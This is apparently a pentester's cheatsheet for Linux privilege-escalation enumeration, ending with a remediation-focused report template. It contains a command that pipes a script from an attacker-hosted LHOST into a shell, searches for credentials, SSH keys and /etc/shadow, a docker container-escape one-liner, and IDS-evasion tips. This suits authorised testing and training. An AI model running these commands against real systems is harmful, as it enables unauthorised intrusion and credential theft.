Field Manual

Linux PrivEsc Enumeration

4 min read

🛡️ Methodology Checklist

  • Run LinPEAS: ./linpeas.sh | tee linpeas.out
  • OS/kernel version: uname -a; cat /etc/os-release
  • Current user context: id; whoami; groups
  • Sudo rights: sudo -l
  • SUID/SGID binaries: find / -perm -4000 -o -perm -2000 2>/dev/null
  • World-writable files in sensitive paths
  • Cron jobs: cat /etc/crontab; ls /etc/cron.*
  • Running processes as root: ps aux | grep root
  • Open internal ports: ss -tlnp
  • Config files, history, SSH keys with credentials

🎯 Operational Context

Use when: Linux shell obtained — systematic enumeration to identify privilege escalation paths before attempting exploits. Think Dumber First: Run LinPEAS first: curl http://[LHOST]/linpeas.sh | sh or python3 -m http.server host it. LinPEAS highlights in red = high-probability privesc paths. Read the red output first. Then check sudo -l and find / -perm -4000 -type f 2>/dev/null. Skip when: Already root — no privesc needed.

⚡ Tactical Cheatsheet

CommandTactical Outcome
whoami; id; hostname; ip aBasic orientation — who, groups, where
sudo -lCheck sudo rights → cross-ref GTFOBins immediately
cat /etc/os-release; uname -aOS + kernel version for CVE lookup
env; echo $PATHEnvironment variables (creds?) + writable PATH dirs
cat /etc/passwd | grep "sh$"Users with login shells
cat /etc/fstab; lsblk; df -hMounted filesystems, block devices, unmounted drives
arp -a; route; netstat -rnNetwork neighbors + routing for pivot targets
find / -type f -name ".*" 2>/dev/null | grep [USER]Hidden files owned by target user
ls -la /tmp /var/tmp /dev/shmWorld-writable temp dirs
grep 'DB_USER|DB_PASSWORD' /var/www/html/wp-config.phpWordPress DB creds
grep -riP "password|pwd|db_auth" /var/www/html/ 2>/dev/nullRecursive cred hunt in web root
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/nullSystem-wide config file hunt
find / -name "id_rsa" -o -name "id_dsa" 2>/dev/nullSSH private key hunt
cat ~/.bash_history; cat ~/.ssh/known_hostsCommand history + lateral movement targets
find / -name "*.bak" -o -name "*.old" 2>/dev/nullBackup files with stale creds
find / -writable 2>/dev/null | grep -v procWritable files/dirs (PATH abuse targets)

🔬 Deep Dive & Workflow

Initial Enumeration Priority Order

1. sudo -l → GTFOBins → instant privesc if NOPASSWD exists
2. id → check: sudo, lxd, docker, adm, disk groups
3. uname -a → kernel version → searchsploit → kernel exploit (last resort)
4. env / printenv → API keys, DB passwords in environment
5. cat ~/.bash_history → passwords typed at CLI
6. cat /etc/crontab; ls /etc/cron.d/ → scheduled root tasks
7. find / -name "*.conf" / "*.bak" / "id_rsa" 2>/dev/null
8. Web roots: /var/www/html → wp-config.php, .env, config.php

Privileged Group Membership

GroupPrivEsc Path
sudosudo -l → GTFOBins
dockerdocker run -v /:/mnt --rm -it alpine chroot /mnt sh → root on host
lxdLXD container escape → mount host root
diskRead raw disk → access /etc/shadow
admRead system logs → find creds
shadowRead /etc/shadow → crack hashes

SSH Key Exploitation

# Find private key
find / -name "id_rsa" 2>/dev/null
cat ~/.ssh/known_hosts          # reveals lateral movement targets
 
# Use discovered key
chmod 600 id_rsa
ssh [USER]@[TARGET_IP] -i id_rsa
 
# Check known_hosts for hashed entries (decode with hashcat)

Temp Directory Stability

  • /tmp — deleted on reboot or after 10 days (use for quick payloads)
  • /var/tmp — persists through reboots, 30 days (use for persistence)
  • /dev/shm — RAM-based, fast, no disk writes (IDS evasion)

Defense Awareness

# Check for AppArmor (blocks SUID exploits even as root)
cat /etc/apparmor.d/
 
# Check for SELinux
sestatus
 
# Check firewall rules
iptables -L; ufw status

🛠️ Troubleshooting & Edge Cases

ProblemCauseFix
LinPEAS fails to downloadNo internet from targetTransfer via file transfer method; or run manual checks: sudo -l, SUID find, cron check
LinPEAS output too longTerminal scrollback limitedRedirect: linpeas.sh 2>&1 | tee /tmp/lp.txt; search offline
sudo -l requires passwordInteractive sudo needs authCurrent user can still check sudo version for CVE-2021-3156 (sudo heap overflow)
SUID binary found but not exploitableNon-standard binaryCheck GTFOBins: https://gtfobins.github.io/ for every SUID binary found
No obvious privesc pathEnumeration complete, nothing obviousCheck: writable cron directories, writable service files, NFS no_root_squash, capabilities (getcap -r / 2>/dev/null)

📝 Reporting Trigger

Finding Title: Linux Privilege Escalation Vector Identified via System Enumeration Impact: Systematic post-exploitation enumeration identifies misconfigured permissions, SUID binaries, writable service files, or insecure sudo rules that allow a low-privileged user to escalate to root without additional exploitation. Root Cause: System not hardened to CIS Linux Benchmark standards. Misconfigured permissions, excessive SUID binaries, or insecure sudo rules deployed without security review. Recommendation: Apply CIS Linux Benchmark hardening. Remove unnecessary SUID/SGID bits. Audit sudo rules for NOPASSWD and unsafe commands. Implement regular Linux hardening assessments.

🔗 Related Nodes

Graph View

Backlinks